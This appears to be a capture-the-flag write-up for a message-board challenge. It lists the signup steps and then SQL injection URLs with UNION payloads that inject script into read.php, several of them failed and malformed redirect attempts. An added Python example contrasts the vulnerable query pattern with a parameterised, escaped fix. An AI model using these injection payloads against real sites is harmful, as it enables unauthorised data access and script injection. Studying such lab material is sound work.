HSpace Free Board Write Up
1. Read the challenge, then connect to the provided link
++ What is a BlackBox challenge?
In a CTF (Capture The Flag) competition, a "BlackBox challenge" is a type of security challenge in which participants must solve the problem without any concrete information about the given system, service or program, such as its internal behaviour or source code.
2. Create an arbitrary account and sign up --> after signing up, the login window appeared again
3. Log in with the registered account
4. Press the Post button at the very bottom to write a post --> confirmed that it was posted normally
5. Tried to pop an alert window through URL manipulation --> confirmed that the script was applied successfully
# URL used
http://cat.moe:8004/read.php?id=200%20union%20select%20null,null,%27%3Cscript%3Ealert(1)%3C/script%3E%27,null
6. Afterwards, tried to solve it by running the scripts below, but could not get past the Error window problem
# URLs and scripts used
1. http://cat.moe:8004/read.php?id=200%20union%20select%20null,null,%27%3Cscript%3E%20function%20goToPage(./flag.php)%20%7B%20window.location.href%20=%20url;%20%7D%20%3C/script%3E%27,null
2. http://cat.moe:8004/read.php?id=200%20union%20select%20null,null,%27%3Cscript%3E%20function%20goToPage(flag)%20%7B%20window.location.href%20=%20url;%20%7D%20%3C/script%3E%27,null%27
3. http://cat.moe:8004/read.php?id=200%20union%20select%20null,null,%27%3Cscript%3Ealert(200)%3C/script%3E%27,null
4. http://cat.moe:8004/read.php?id=200%20union%20select%20null,null,%27%3Cscript%3Ealert(??)%3C/script%3E%27,null
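The behaviour the write-up relies on (the `id` parameter spliced into the SQL query, and the injected UNION row rendered into the page unescaped) next to the corresponding fix, as an added Python example that is not part of the original post or the challenge. The `posts` table, its schema and the four-column order are assumptions chosen only to match the four values in the payload above.

```python
import html
import sqlite3
from urllib.parse import unquote

# Constructed sample data: the real board's schema is unknown; the four
# columns merely mirror the four values in the write-up's union payload.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER, title TEXT, content TEXT, author TEXT)")
    conn.execute("INSERT INTO posts VALUES (1, 'hello', 'first post', 'alice')")
    conn.execute("INSERT INTO posts VALUES (2, 'markup', '<b>bold</b>', 'bob')")
    return conn

# The id parameter from the write-up's first URL, URL-decoded.
PAYLOAD = unquote("200%20union%20select%20null,null,%27%3Cscript%3Ealert(1)%3C/script%3E%27,null")

def read_vulnerable(conn, id_param):
    """Pattern the write-up exploits: id is concatenated into the SQL text,
    so a UNION appends an attacker-chosen row, and the content column is
    emitted into HTML without escaping, so that row becomes live script."""
    sql = f"SELECT id, title, content, author FROM posts WHERE id = {id_param}"
    rows = conn.execute(sql).fetchall()
    return "".join(f"<div>{r[2]}</div>" for r in rows)

def read_hardened(conn, id_param):
    """Defences, each sufficient on its own against one half of the bug:
    - id must parse as an integer (rejects the whole UNION string),
    - the query is parameterised (input can never change the SQL text),
    - content is HTML-escaped on output (stored markup cannot run)."""
    try:
        post_id = int(id_param)
    except ValueError:
        return None  # reject the request; a real handler would return 400
    sql = "SELECT id, title, content, author FROM posts WHERE id = ?"
    rows = conn.execute(sql, (post_id,)).fetchall()
    return "".join(f"<div>{html.escape(r[2])}</div>" for r in rows)

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", read_vulnerable(db, PAYLOAD))  # injected row rendered as script
    print("hardened:  ", read_hardened(db, PAYLOAD))    # None: payload rejected
    print("hardened:  ", read_hardened(db, "2"))        # stored markup is escaped
```

Either the parameterised query or the output escaping alone would have stopped the alert in the write-up; applying both is what keeps a later bug in one layer from reopening the issue.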
https://studyforall.tistory.com/60